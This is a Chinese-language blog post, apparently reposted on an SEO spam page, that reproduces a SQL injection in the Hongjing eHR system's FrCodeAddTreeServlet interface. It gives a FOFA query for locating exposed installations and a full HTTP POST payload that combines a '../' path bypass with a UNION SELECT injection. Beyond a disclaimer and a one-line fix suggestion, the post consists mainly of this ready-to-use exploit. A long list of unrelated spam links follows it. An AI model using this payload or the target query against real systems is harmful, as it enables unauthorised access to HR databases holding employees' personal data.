当前位置: 首页 > news >正文

做试题网站上海网站排名优化公司

做试题网站,上海网站排名优化公司,做服装有哪些好的网站有哪些,公司注销预审在什么网站做前言 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、产…

前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、产品简介

宏景eHR是一款面向国有企事业单位的人力资源管理数智化软件产品,旨在帮助企业实现人力资源的数字化和智能化管理。

二、漏洞描述

该系统FrCodeAddTreeServlet接口存在SQL注入漏洞

三、影响范围

未知

四、复现环境

FOFA:app=“HJSOFT-HCM”

五、漏洞复现

1.访问存在漏洞的网站,抓包
在这里插入图片描述

2.测试payload

POST /templates/attestation/../../servlet/FrCodeAddTreeServlet HTTP/1.1
Host: IP:port
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Length: 132
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencodedparams=&issuperuser=&parentid=&privType=&manageprive=&action=&target=&showType=1'+UNION+ALL+SELECT+123,NULL,NULL,NULL,NULL,NULL--+

3.成功
在这里插入图片描述

在这里插入图片描述

六、修复建议

及时更新系统,安装防护设备,过滤请求中的敏感字符

http://www.bjxfkj.com.cn/article/104533.html

相关文章:

  • 怎么建网站手机版北京网站建设专业公司
  • 中山做网站的公司外贸网站平台
  • 德州建设街小学网站全网推广推荐
  • 263net企业邮箱可靠的网站优化
  • 中小企业网站制作软件注册域名后怎么建网站
  • 单位网站建设热门网站
  • 佛山专业网站推广公司电商平台怎么注册
  • 北碚网站建设哪家好申请网址怎么申请的
  • 寻找做项目的网站电商网站平台搭建
  • 云南网站建设公司哪家好免费手游推广代理平台渠道
  • 网站的资讯内容什么文案容易上热门
  • 我想做网站卖衣服做怎么做网站模板
  • 网站图片要多少像素怎么制作小程序
  • 淘宝客怎么在微博做网站网站服务器信息查询
  • 南昌专业做网站的网络整合营销理论案例
  • 企业网站建设的策划书qq群推广网站免费
  • 做网站 需要注意什么申请域名的方法和流程
  • 国外翻墙设计网站做个公司网站多少钱
  • 阿里云个人备案可以做企业网站公司seo是什么职位
  • 营销网站建设流程图1688自然排名怎么做好
  • 双桥区网站制作网络营销策划目的
  • 腾讯云网站备案吗如何提高网站的搜索排名
  • 手机端网站制作教程核酸检测最新消息
  • 广东网站建设方便济宁百度推广电话
  • 沈阳网站优化怎么做独立站seo实操
  • 建立传媒公司网站重庆seo网站系统
  • 网络 网站建设疫情最新数据消息地图
  • 做网站常用图标合肥关键词快速排名
  • 北京上地做网站营销网
  • cc wordpress网站首页的优化